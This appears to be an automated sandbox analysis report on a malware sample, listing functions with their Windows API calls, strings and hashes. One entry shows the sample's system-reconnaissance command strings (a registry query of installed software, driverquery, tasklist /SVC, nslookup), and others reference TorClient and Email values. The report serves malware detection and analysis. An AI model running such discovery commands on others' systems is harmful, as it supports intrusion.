Download Yara Rule

APIs

lstrlen.KERNEL32(?,7656D3B0,00000000,?,00B165AB,00000000,73BCF710,00000000,00000000,?,?,00B358C6,?,?), ref: 00B32AF4
RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 00B32B0C
memcpy.NTDLL(0000000C,00B120D2,00000001,?,?,00B358C6,?,?,?,?,?,00B120D2,?), ref: 00B32B22

Part of subcall function 00B225FA: StrChrA.SHLWAPI(?,?,7656D3B0,05778D54,?,?,?,00B28517,?,00000020,05778D54,?,?,00B358C6,?,?), ref: 00B22620
Part of subcall function 00B225FA: StrTrimA.SHLWAPI(?,00B3A48C,00000000,?,?,00B28517,?,00000020,05778D54,?,?,00B358C6,?,?), ref: 00B2263F
Part of subcall function 00B225FA: StrChrA.SHLWAPI(?,?,?,?,00B28517,?,00000020,05778D54,?,?,00B358C6,?,?), ref: 00B22650
Part of subcall function 00B225FA: StrTrimA.SHLWAPI(00000001,00B3A48C,?,?,00B28517,?,00000020,05778D54,?,?,00B358C6,?,?), ref: 00B22662

HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000), ref: 00B32B54

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: HeapTrim$AllocateFreelstrlenmemcpy
String ID:
API String ID: 1635803283-0
Opcode ID: aa335cc81349d8a4f3996022a74e6354691616a5682156cefe2ec096504c7a3c
Instruction ID: 9f5dedf0f9e5b958082fd85a23e040d448682a96324dd47fe9a05145017225fe
Opcode Fuzzy Hash: aa335cc81349d8a4f3996022a74e6354691616a5682156cefe2ec096504c7a3c
Instruction Fuzzy Hash: A3018F32600315BBE7215F11FCC8F2BBBE9EB90B51F204065F6499A0A0EB60980A9761

Uniqueness

Uniqueness Score: -1.00%

Function 00B31415, Relevance: 6.0, APIs: 4, Instructions: 49sleepCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00B3E268), ref: 00B31420
Sleep.KERNEL32(0000000A,?,?,?,00B2375B,00000000,?,00000029,00B3E088,00B1AC22,?), ref: 00B3142A
SetEvent.KERNEL32(?,?,?,00B2375B,00000000,?,00000029,00B3E088,00B1AC22,?), ref: 00B31481
RtlLeaveCriticalSection.NTDLL(00B3E268), ref: 00B314A0

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterEventLeaveSleep
String ID:
API String ID: 1925615494-0
Opcode ID: d016059fec9c3456ae4e3ba975c7ca769c72cc4d3bb32890150c08443c5c5fa2
Instruction ID: d0b32acb646847affe3d3dab52b55b47f35895c9f7a480e56b5d0dccdf2a3d6e
Opcode Fuzzy Hash: d016059fec9c3456ae4e3ba975c7ca769c72cc4d3bb32890150c08443c5c5fa2
Instruction Fuzzy Hash: C1017171640304FBE710ABA8AD45B6E3AECEB04701F304462F709E71E1DFB4A904DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00B2B1E7, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

RtlInitializeCriticalSection.NTDLL(00B3E240), ref: 00B2B20B
RtlInitializeCriticalSection.NTDLL(00B3E220), ref: 00B2B221
GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B317C0), ref: 00B2B232
GetModuleHandleA.KERNEL32(00B3F01D), ref: 00B2B25F

Part of subcall function 00B2E9BE: GetModuleHandleA.KERNEL32(NTDLL.DLL,?,?,00000001), ref: 00B2E9CF
Part of subcall function 00B2E9BE: LoadLibraryA.KERNEL32(NTDSAPI.DLL,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B2EA69
Part of subcall function 00B2E9BE: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B2EA74

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
String ID:
API String ID: 1711133254-0
Opcode ID: 8aa41e0b1436752b040a9339f9cd94ef9304532cfcf0a9265792d71b9f23b543
Instruction ID: 695ac974431858b86b85198e21042385c291a89656444710dcc2068189cc256a
Opcode Fuzzy Hash: 8aa41e0b1436752b040a9339f9cd94ef9304532cfcf0a9265792d71b9f23b543
Instruction Fuzzy Hash: E2010571A403108BE7589F6ABC86A4E7FE8A749310B20496BE569972E0DFB098448F61

Uniqueness

Uniqueness Score: -1.00%

Function 00B25195, Relevance: 6.0, APIs: 4, Instructions: 41fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B14B29: lstrlen.KERNEL32(00000000,00000000,00000000,00B1F1E8,reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >,00000000,?,driverquery.exe >,00000000,?,tasklist.exe /SVC >,00000000,?,nslookup 127.0.0.1 >,00000000), ref: 00B14B2E
Part of subcall function 00B14B29: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 00B14B43
Part of subcall function 00B14B29: wsprintfA.USER32 ref: 00B14B58
Part of subcall function 00B14B29: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 00B14B74

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00B251B9
GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00B251C8
CloseHandle.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00B251D1
GetLastError.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00B251D9

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
String ID:
API String ID: 4042893638-0
Opcode ID: 10d1a21f811498127f9b22b4d5a3cb3213e3ce0ab61e72b1e5e2943579cf26ed
Instruction ID: f76654c733d3dc0918eb39ffafcbc7797055103420ed02cde09a78ba3fb8864d
Opcode Fuzzy Hash: 10d1a21f811498127f9b22b4d5a3cb3213e3ce0ab61e72b1e5e2943579cf26ed
Instruction Fuzzy Hash: 76F0EC70381B207AF23927B47CCEF6F229CEB45722F2002A8F60AB20D0CEA44D140562

Uniqueness

Uniqueness Score: -1.00%

Function 00B1F454, Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(?,?), ref: 00B1F466

Part of subcall function 00B24241: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,00B21ED8), ref: 00B24282
Part of subcall function 00B24241: GetLastError.KERNEL32 ref: 00B2428C
Part of subcall function 00B24241: WaitForSingleObject.KERNEL32(000000C8), ref: 00B242B1
Part of subcall function 00B24241: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 00B242D2
Part of subcall function 00B24241: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 00B242FA
Part of subcall function 00B24241: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 00B2430F
Part of subcall function 00B24241: SetEndOfFile.KERNEL32(00000006), ref: 00B2431C
Part of subcall function 00B24241: CloseHandle.KERNEL32(00000006), ref: 00B24334

WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,00B1A1BE,.dll,?,00001000,?,?,?), ref: 00B1F489
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,00B1A1BE,.dll,?,00001000,?,?,?), ref: 00B1F4AB
GetLastError.KERNEL32(?,00B1A1BE,.dll,?,00001000,?,?,?), ref: 00B1F4BF

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
String ID:
API String ID: 3370347312-0
Opcode ID: d92a355ea0d42760054b2fd1ffb5f8a16c44122af4f1a19469772d0e913151cc
Instruction ID: fca05f27f31c8893e97cab685449c577c85f6e7e04458890f28f88b87a0457be
Opcode Fuzzy Hash: d92a355ea0d42760054b2fd1ffb5f8a16c44122af4f1a19469772d0e913151cc
Instruction Fuzzy Hash: 3DF0A435240205BBDB155F609C4AFAE3A65EF04710F604411F61AA62E0DF7194A1DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00B27854, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 39stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004F0053,System,00000000,00000000,?,?,00B1F7B7,004F0053,00000000), ref: 00B27860
memcpy.NTDLL(00000000,004F0053,00000000,00000002,?,?,00B1F7B7,004F0053,00000000), ref: 00B27888
memset.NTDLL ref: 00B2789A

Strings

System, xrefs: 00B2785A

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: lstrlenmemcpymemset
String ID: System
API String ID: 4042389641-3470857405
Opcode ID: 7cec3836fc86100ec31791fc9e3be6471935dd6d50e513df9557d0cfd323c0b5
Instruction ID: edd6321e7db4466f99c778c945be9b4c32af18a7768574c0736fdfaa17aaa4ab
Opcode Fuzzy Hash: 7cec3836fc86100ec31791fc9e3be6471935dd6d50e513df9557d0cfd323c0b5
Instruction Fuzzy Hash: 1AF0E9B7900714BBD7206BA9AC8DDAF3EECDBD8394B140465FD1A97301E970DE0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B2CEB4, Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000012B,00B193AD,000000FF,05778900,?,?,00B1815D,0000012B,05778900), ref: 00B2CED0
GetLastError.KERNEL32(?,?,00B1815D,0000012B,05778900,?,?,00B279A9,00000000,?), ref: 00B2CEDB
WaitNamedPipeA.KERNEL32(00002710), ref: 00B2CEFD
WaitForSingleObject.KERNEL32(00000000,?,?,00B1815D,0000012B,05778900,?,?,00B279A9,00000000,?), ref: 00B2CF0B

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
String ID:
API String ID: 4211439915-0
Opcode ID: f6e600a85f063f9a2cb194cd0a31342eb89d75ad806c51aac196b8f91916261e
Instruction ID: b92d778e8b8b2082e38159919c24a7a86a92c515151dc9945661b2a790978c94
Opcode Fuzzy Hash: f6e600a85f063f9a2cb194cd0a31342eb89d75ad806c51aac196b8f91916261e
Instruction Fuzzy Hash: 31F06D32604230ABD7341B64BC8DB5E7E66EB043B1F214561FA1DA71F0CAB18C48DA91

Uniqueness

Uniqueness Score: -1.00%

Function 00B1675E, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,00B11CDF,00000000,00000000,?,?,00000000,?,?,?,00B11CDF,TorClient), ref: 00B26765
Part of subcall function 00B2672D: RtlAllocateHeap.NTDLL(00000000,00B11CDF), ref: 00B26779
Part of subcall function 00B2672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,00B11CDF,?,?,?,00B11CDF,TorClient,?,?), ref: 00B26793
Part of subcall function 00B2672D: RegCloseKey.KERNELBASE(?,?,?,?,00B11CDF,TorClient,?,?), ref: 00B267BD

memcpy.NTDLL(00B3D06C,?,00000028,00000000,Client,?,?,?,?,?,00B358E7,?,?,?,?,00B120D2), ref: 00B16790
HeapFree.KERNEL32(00000000,?,Client,?,?,?,?,?,00B358E7,?,?,?,?,00B120D2,?), ref: 00B167C1

Strings

(, xrefs: 00B16779
Client, xrefs: 00B1676B

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseFreememcpy
String ID: ($Client
API String ID: 1301464996-90774469
Opcode ID: 2a06153a73ab1aebf7b671e2b107797bc7847ebd10db9b14f6e07bfa47d2133e
Instruction ID: bdd51a43e47372cfd1445d2ac2eb41d2589544e8df44f3c7d4905bb10a630de9
Opcode Fuzzy Hash: 2a06153a73ab1aebf7b671e2b107797bc7847ebd10db9b14f6e07bfa47d2133e
Instruction Fuzzy Hash: 86F03C76940218FBDB259F80FD46F9D7BA8E714B44F200096F905631E0DAB05D858F65

Uniqueness

Uniqueness Score: -1.00%

Function 00B284CA, Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(05778D20), ref: 00B284D3
Sleep.KERNEL32(0000000A,?,?,00B358C6,?,?,?,?,?,00B120D2,?), ref: 00B284DD
HeapFree.KERNEL32(00000000,?,?,?,00B358C6,?,?,?,?,?,00B120D2,?), ref: 00B28505
RtlLeaveCriticalSection.NTDLL(05778D20), ref: 00B28523

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 55f56d236c84f285c502a507c02b8f2a34709c8cc4594a88682d2c970d5e95c9
Instruction ID: 37ee140ffd49b2e60799ac907919f8502df386f78c99c8ebd7dd6c9e87329ee9
Opcode Fuzzy Hash: 55f56d236c84f285c502a507c02b8f2a34709c8cc4594a88682d2c970d5e95c9
Instruction Fuzzy Hash: E7F05870201A40ABE7249B28FD88F1E3BE5EB10740F248446F51AD72B1CE30ED04DB26

Uniqueness

Uniqueness Score: -1.00%

Function 001F4ACE, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(001FD224), ref: 001F4AD9
SleepEx.KERNEL32(00000064,00000001), ref: 001F4AE8
CloseHandle.KERNEL32(001FD224), ref: 001F4B09
HeapDestroy.KERNEL32(001FD1F0), ref: 001F4B19

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: ebdeb0f39731fb303e6be8bae73142b4289e80c4d1d82f04d8b81f88b04b72ed
Instruction ID: 659c6beb61ebd6cc598b3f6a2b798d1b59ebdb219d5f9fb3a3e2607f0562ba73
Opcode Fuzzy Hash: ebdeb0f39731fb303e6be8bae73142b4289e80c4d1d82f04d8b81f88b04b72ed
Instruction Fuzzy Hash: 1EF0397570431ADBEB209B79BE0CF3737ADAB54752B040510BE01D3AA5DF20C882D6E0

Uniqueness

Uniqueness Score: -1.00%

Function 001FA302, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(001FD294), ref: 001FA30B
Sleep.KERNEL32(0000000A,?,?,001F7260,?,?,?,?,?,001F258B), ref: 001FA315
HeapFree.KERNEL32(00000000,00000000,?,?,001F7260,?,?,?,?,?,001F258B), ref: 001FA33D
RtlLeaveCriticalSection.NTDLL(001FD294), ref: 001FA359

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 767496419463f5c89daae5102ca5be6f4074b0c76b1609f3d6c183f73ff8c845
Instruction ID: 49f4d5b2620bb4e58cdbe21a56f2d954c2e80665cdce403c4dc85356ac14b474
Opcode Fuzzy Hash: 767496419463f5c89daae5102ca5be6f4074b0c76b1609f3d6c183f73ff8c845
Instruction Fuzzy Hash: 3DF012B4605245DBD7249F69EE48F3A37B5BF10744F044404F645D7A61CB34EC82EB9A

Uniqueness

Uniqueness Score: -1.00%

Function 001F6BB2, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(001FD294), ref: 001F6BBB
Sleep.KERNEL32(0000000A,?,?,001F7260,?,?,?,?,?,001F258B), ref: 001F6BC5
HeapFree.KERNEL32(00000000,?,?,?,001F7260,?,?,?,?,?,001F258B), ref: 001F6BF3
RtlLeaveCriticalSection.NTDLL(001FD294), ref: 001F6C08

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 077b7698d3a6eda6728ec43377f1fde7b0a220808868113c089afdefc6e53089
Instruction ID: 0e4bea491a8e748d3bc3bca26cca2d11780f34bf79a8f518269b9cc7fc91babf
Opcode Fuzzy Hash: 077b7698d3a6eda6728ec43377f1fde7b0a220808868113c089afdefc6e53089
Instruction Fuzzy Hash: E1F0D47830120AEFE7188B65EE99F3937A6AB44340B040418F602D7B70CB30EC82EB94

Uniqueness

Uniqueness Score: -1.00%

Function 00B191C1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

Email, xrefs: 00B19217, 00B19224

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID: Email
API String ID: 1279760036-642995056
Opcode ID: 59e7582cecdf4090d7591fcae8ef13f55104d95db856425844392b67b362a684
Instruction ID: 3bda4a42694eff55a92f0bc7de0638b7c9efc0761f81ce1ee979fcd7f2d3da8a
Opcode Fuzzy Hash: 59e7582cecdf4090d7591fcae8ef13f55104d95db856425844392b67b362a684
Instruction Fuzzy Hash: F6319CB1108349BFDB119F51DC84CAFBFE9FB88394F500829F99592061D7318EA4DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00B19A6E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,00B21EE3,00000000,00000000,00000000,00000000,00000006,?,?,?,00000000), ref: 00B19A8C
wsprintfA.USER32 ref: 00B19AAA

Strings

%02u:%02u:%02u , xrefs: 00B19AA4

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: SystemTimewsprintf
String ID: %02u:%02u:%02u
API String ID: 425189169-982595855
Opcode ID: c207e2dcb6d1b68aefd1989c722e2e37937cf8e41392d2d1ff5c522fd7c87da1
Instruction ID: 9f448dc1494f50d76115993591f90e179c1b7bc56297842da56670a81e212888
Opcode Fuzzy Hash: c207e2dcb6d1b68aefd1989c722e2e37937cf8e41392d2d1ff5c522fd7c87da1
Instruction Fuzzy Hash: E521DB75A00304AFCB15DB95DC4AEAB77B8FB88701B604865F911DB291DA74E841CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00B280EE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,?), ref: 00B28132
StrToIntExA.SHLWAPI(00007830,00000001,00000001), ref: 00B28144

Strings

0x, xrefs: 00B2812C

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: memcpy
String ID: 0x
API String ID: 3510742995-3225541890
Opcode ID: 078ae29c898c140faac1da099754e649d862a3166980c3bc698c95504193d4d6
Instruction ID: 5c81ec4f6ea7f9de610d8047c21a1494c6d3013adb4dbda4deeb90bd30ea2529
Opcode Fuzzy Hash: 078ae29c898c140faac1da099754e649d862a3166980c3bc698c95504193d4d6
Instruction Fuzzy Hash: 0801B136910219BBDB01DFA8EC41AEEBBF9EF48301F000451E908E7250EB74EA09C791

Uniqueness

Uniqueness Score: -1.00%

Function 00B30BC5, Relevance: 5.2, APIs: 4, Instructions: 157memoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B30C23
CloseHandle.KERNEL32(?,?,00000010,?,00000000,00000000,00B145A1,00000000), ref: 00B30C6E
HeapFree.KERNEL32(00000000,00000000,00000000,00000094,00000000,00B2A4DB,00000000,00B145A1,00B123B1,00000000,00B145A1,00B32B6B,00000000,00B145A1,00B323B3,00000000), ref: 00B30F6A
GetLastError.KERNEL32(?,00000000,?), ref: 00B3118C

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CloseErrorFreeHandleHeapLastmemset
String ID:
API String ID: 2333114656-0
Opcode ID: 9e56742d87f72e4e8cf00db340b6caaef094dd142225e9d9e4f2d0bfb4d76ba4
Instruction ID: 49c700b4455b980e603b62cd8f99e39ed0fbca557ab93669a55f70c486fa2249
Opcode Fuzzy Hash: 9e56742d87f72e4e8cf00db340b6caaef094dd142225e9d9e4f2d0bfb4d76ba4
Instruction Fuzzy Hash: 24410836504A19BADB216F28DC82FFF36EDEF46740F7048E2FA45B2091CB709D519662

Uniqueness

Uniqueness Score: -1.00%

Function 00B11684, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2118D: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,00B116BA,?,?,?,?), ref: 00B211B1
Part of subcall function 00B2118D: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00B211C3
Part of subcall function 00B2118D: wcstombs.NTDLL ref: 00B211D1
Part of subcall function 00B2118D: lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,00B116BA,?,?,?), ref: 00B211F5
Part of subcall function 00B2118D: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 00B2120A
Part of subcall function 00B2118D: mbstowcs.NTDLL ref: 00B21217
Part of subcall function 00B2118D: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,00B116BA,?,?,?,?,?), ref: 00B21229
Part of subcall function 00B2118D: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,00B116BA,?,?,?,?,?), ref: 00B21243

GetLastError.KERNEL32 ref: 00B11723

Part of subcall function 00B118E3: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 00B1199D
Part of subcall function 00B118E3: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 00B119BD
Part of subcall function 00B118E3: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 00B119C9

HeapFree.KERNEL32(00000000,?), ref: 00B1173F
HeapFree.KERNEL32(00000000,?), ref: 00B11750
SetLastError.KERNEL32(00000000), ref: 00B11753

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
String ID:
API String ID: 3867366388-0
Opcode ID: f443dc047f927e4c8b52c4bf845f08db2a0b90d794334a3f753e5b5f6e7c29c8
Instruction ID: 2291bba96df056160a172c3653e8d3bb9b32ecda73de997fb089388a36ba0b48
Opcode Fuzzy Hash: f443dc047f927e4c8b52c4bf845f08db2a0b90d794334a3f753e5b5f6e7c29c8
Instruction Fuzzy Hash: 80312936900208AFCF029F99DC848DEBFB5EF44310B5445A6FA25A3260C7318EA1DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00B24FC5, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B1C550: lstrlen.KERNEL32(00000000,?,?,00000000,770F4620,?,00000001,00000001,?,00B211EE,?,?,?,?,?,00000000), ref: 00B1C5A9
Part of subcall function 00B1C550: lstrlen.KERNEL32(?,?,?,00000000,770F4620,?,00000001,00000001,?,00B211EE,?,?,?,?,?,00000000), ref: 00B1C5C7
Part of subcall function 00B1C550: RtlAllocateHeap.NTDLL(00000000,73B76985,?), ref: 00B1C5F0
Part of subcall function 00B1C550: memcpy.NTDLL(00000000,00000000,00000000,?,00000001,00000001,?,00B211EE,?,?,?,?,?,00000000), ref: 00B1C607
Part of subcall function 00B1C550: HeapFree.KERNEL32(00000000,00000000), ref: 00B1C61A
Part of subcall function 00B1C550: memcpy.NTDLL(00000000,?,?,?,00000001,00000001,?,00B211EE,?,?,?,?,?,00000000), ref: 00B1C629

GetLastError.KERNEL32 ref: 00B25064

Part of subcall function 00B118E3: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 00B1199D
Part of subcall function 00B118E3: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 00B119BD
Part of subcall function 00B118E3: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 00B119C9

HeapFree.KERNEL32(00000000,?), ref: 00B25080
HeapFree.KERNEL32(00000000,?), ref: 00B25091
SetLastError.KERNEL32(00000000), ref: 00B25094

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
String ID:
API String ID: 2451549186-0
Opcode ID: 64bc669ed30e5587463a8c5be0b6f3d46fdd141346d8c7a5cdefffc6d6ed9ba2
Instruction ID: bb695e9f70e311fd31aa799b1461a79d4b249a405d0a5ab15d5f2549f0bee9bb
Opcode Fuzzy Hash: 64bc669ed30e5587463a8c5be0b6f3d46fdd141346d8c7a5cdefffc6d6ed9ba2
Instruction Fuzzy Hash: F0310932900218EFCF129F99EC458DEBFB5FF48310B1045A6F929A2161C7719E61DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00B2F57B, Relevance: 5.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B2F5C6
memset.NTDLL ref: 00B2F5DD
memset.NTDLL ref: 00B2F5F4
memset.NTDLL ref: 00B2F60C

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 2be791d55cadc002b79dcdc056a6f0a7dd174cdb724bca63d9457adc615613d2
Instruction ID: 4c076bcdc0a89e00e9a2f0f75aeddcf42dab04cf0d9511e5af5d69b124683575
Opcode Fuzzy Hash: 2be791d55cadc002b79dcdc056a6f0a7dd174cdb724bca63d9457adc615613d2
Instruction Fuzzy Hash: 7321927250091ABFCB215F90FC8597677B9FF19300B8401B9F94946961D732E8B6CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 001FA586, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,001FD000,?,00000008,?,?,001F9F48,00000000,00000000,00000000,001FD270,?,?,001FA278,?,001FD270), ref: 001FA592

Part of subcall function 001F550F: RtlAllocateHeap.NTDLL(00000000,?,001F21E6), ref: 001F551B

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,001F9F48,00000000,00000000,00000000,001FD270,?,?,001FA278), ref: 001FA5F0
lstrcpy.KERNEL32(00000000,00000000), ref: 001FA600
lstrcpy.KERNEL32(00000000,00000000), ref: 001FA60C

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: aeea620d038c5d41524ba5d794da0fd69a1cef64bd3b2d86277b000f2e4063e3
Instruction ID: 4d4b4b182dc93495a3a2fb9667c03eb3531b4b2ce32b3581324df1c96c8c9730
Opcode Fuzzy Hash: aeea620d038c5d41524ba5d794da0fd69a1cef64bd3b2d86277b000f2e4063e3
Instruction Fuzzy Hash: 4D21C0B640421DEBCB01AF64CC44ABE7FA9AF16394B598054FA099B211DB38D941D7E2

Uniqueness

Uniqueness Score: -1.00%

Function 00B17D07, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,00B18663,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,00B21117), ref: 00B17D13

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

Part of subcall function 00B364DE: StrChrA.SHLWAPI(00000000,0000002F,00000000,00000000,00B17D41,00000000,00000001,00000001,?,?,00B18663,00000000,00000000,00000000,00000008,0000EA60), ref: 00B364EC
